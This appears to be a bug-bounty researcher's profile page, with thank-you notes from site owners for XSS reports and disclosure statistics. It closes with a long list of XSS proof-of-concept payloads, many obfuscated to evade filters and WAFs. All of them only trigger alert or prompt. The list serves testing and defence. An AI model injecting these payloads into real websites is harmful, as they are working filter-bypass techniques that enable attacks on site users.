Researcher reputation:  560

Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5 #aCCESS

About me:
http://blog.inurl.com.br/

How to contact me:
https://twitter.com/Gh05tPT
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544
https://facebook.com/exchangesec/

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements

    21 August, 2019

     aaccomazzi Alberto Accomazzi from Center for Astrophysics:

One more XSS bug discovered and patched thanks to Gh05tPT. Much appreciated!

    3 August, 2019

     NewLineHorizon1 Melisa from NewLineHorizon:

Dear, Thanks for participating in responsible disclosure program. The reports you submitted were extremely helpful to our team and provided us the details we needed to resolve the issues that you identified. We are deeply committed to provide a safe and secure experience to our users and are therefore grateful for your efforts to help us improve our services. Best Regards!

    12 June, 2019

     tony_marston Tony Marston from Radicore Software Limited:

Gh05tPT found a XSS vulnerability on my site which I was able to fix quite quickly. Thanks for your help.

    12 June, 2019

     CapaniAntonio Antonio Capani from Nibbles.it s.r.l.:

Gh05tPT found a XSS vulnerability on one of our sites. We will fix it on the next version of our CMS. Thank you very much for your help!

    24 May, 2019

     aaccomazzi Alberto Accomazzi from Center for Astrophysics:

Gh05tPT helped us discover and fix an XSS vulnerability on our website. Much appreciated!

    16 May, 2019

     Admeus Master from EVS:

Gh05tPT found a XSS vulnerability on our website, which was promptly resolve with his help. Really good communication and sympathy. Thanks

    10 May, 2019

     rjbica Ricardo from XWS:

Gh05tPT found a XSS issue in one of our systems and provided us the technical details to help solve the problem. Thanks!

    3 May, 2019

     pkissman Paul Kissman from Massachusetts Board of Library Commissioners:

Gh05tPT found a basic XSS vulnerability on our website. Some javascript could be entered as a parameter in a GET query and though it wouldn't be processed as form data, it could be reflected out again (unescaped) on the search results page. Thanks very much Gh05tPT.

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

Shows the first 10 recommendations. See all.

Honor Badges

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Total reports:	14877
Total reports on VIP sites:	218
Total patched vulnerabilities:	4553
Total vulnerabilities on Hold (Open Bug Bounty):	3637
Recommendations received:	36
Active since:	05.04.2018
Top Security Researcher Awards:	Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month
Top VIP Security Researcher Awards:	Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week

Open Bug Bounty Certificate

04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)];     fn(atob('YWxlcnQoMSk='));</script>  
<script>var fn=window[String.fromCharCode(101,118,97,108)];     fn(atob('YWxlcnQoMSk='));</script> 
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk='));    </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>     <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script> 
<script>'str1ng'.replace(/1/,alert)</script>     <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>     <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script> 
<script>eval('\\u'+'0061'+'lert(1)')</script>     <script>throw~delete~typeof~prompt(1)</script>     <script>delete[a=alert]/prompt a(1)</script>     <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>     <script>(()=>{return this})().alert(1)</script>    
<script>new function(){new.target.constructor('alert(1)')();}</script>     <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script> 
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>     <script>Array.from`1${alert}3${window}2`</script>     
<script>!{x(){alert(1)}}.x()</script>     <script>Array.from`${eval}alert\`1\``</script>     <script>Array.from([1],alert)</script>     <script>Promise.reject("1").then(null,alert)</script>     
<svg </onload ="1> (_=alert,_(1)) "">     
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>  
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>     
<img onerror=alert(1) src <u></u>     <videogt;<source onerror=javascript:prompt(911)gt;     
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>     
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">     
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <     
<script>```${``[class extends[alert``]{}]}```</script>     <script>[class extends[alert````]{}]</script>     
<script>throw new class extends Function{}('alert(1)')``</script>     <script>x=new class extends Function{}('alert(1)'); x=new x;</script>     <script>new class extends alert(1){}</script> 
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>     
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>     <script src=data:,\u006fnerror=\u0061lert(1)></script>     
"><svg><script/xlink:href="data:,alert(1)     <svg><script/xlink:href=data:,alert(1)></script>     <frameset/onpageshow=alert(1)>     
<div onactivate=alert('Xss') id=xss style=overflow:scroll>     
<div onfocus=alert('xx') id=xss style=display:table>